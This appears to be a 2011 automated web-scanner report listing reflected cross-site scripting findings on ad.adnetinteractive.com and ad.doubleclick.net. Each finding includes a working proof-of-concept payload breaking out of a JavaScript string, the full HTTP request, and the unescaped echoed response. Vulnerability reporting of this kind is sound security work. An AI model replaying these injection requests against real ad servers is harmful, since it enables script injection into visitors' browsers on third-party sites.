In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://ad.adnetinteractive.com/st [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.adnetinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd0e3"-alert(1)-"c4c905c666e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1415802\&cd0e3"-alert(1)-"c4c905c666e=1 HTTP/1.1
Host: ad.adnetinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:03:48 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 03 Feb 2011 19:03:48 GMT
Pragma: no-cache
Content-Length: 4669
Age: 0
Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.adnetinteractive.com/imp?Z=300x250&cd0e3"-alert(1)-"c4c905c666e=1&s=1415802%5c&_salt=4264763177";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.135

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5cd8"-alert(1)-"b9616ec1409 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=a5cd8"-alert(1)-"b9616ec1409 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4862
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 18:54:01 GMT
Expires: Thu, 03 Feb 2011 18:54:01 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
Ghlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=a5cd8"-alert(1)-"b9616ec1409https://insurance.lowermybills.com/auto/?sourceid=57808600-233911573-40497630");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 728;
var winH
...[SNIP]...

1.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.135

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe3a4"-alert(1)-"4f02e128fb4 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAEfe3a4"-alert(1)-"4f02e128fb4&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 18:53:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
Td3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAEfe3a4"-alert(1)-"4f02e128fb4&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40324242");
var wmode = "opaque";
va
...[SNIP]...

1.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.135

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5975c"-alert(1)-"1d646e7eef8 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x905975c"-alert(1)-"1d646e7eef8&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 18:53:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x905975c"-alert(1)-"1d646e7eef8&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40324242");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var win
...[SNIP]...

1.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.135

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bbf3"-alert(1)-"7f571aed142 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=17bbf3"-alert(1)-"7f571aed142&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 18:53:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
mFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=17bbf3"-alert(1)-"7f571aed142&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40324242");
var wmode = "opaque";
var bg =
...[SNIP]...

1.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.135

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7284c"-alert(1)-"82b821f28bc was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q7284c"-alert(1)-"82b821f28bc&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 18:53:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4870

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
X2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q7284c"-alert(1)-"82b821f28bc&client=ca-accuweather-site_728x90&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40567083");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.135

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae9b3"-alert(1)-"8421c6bfdc2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lae9b3"-alert(1)-"8421c6bfdc2&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 18:52:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1d3/%2a/c%3B233911573%3B0-0%3B0%3B57808600%3B3454-728/90%3B40306455/40324242/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lae9b3"-alert(1)-"8421c6bfdc2&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5j
...[SNIP]...

1.8. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.GoogleFinance/B5133220.11

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ab7c"-alert(1)-"ad8c3af37fd was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=3ab7c"-alert(1)-"ad8c3af37fd HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7495
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:05:07 GMT
Expires: Thu, 03 Feb 2011 16:05:07 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
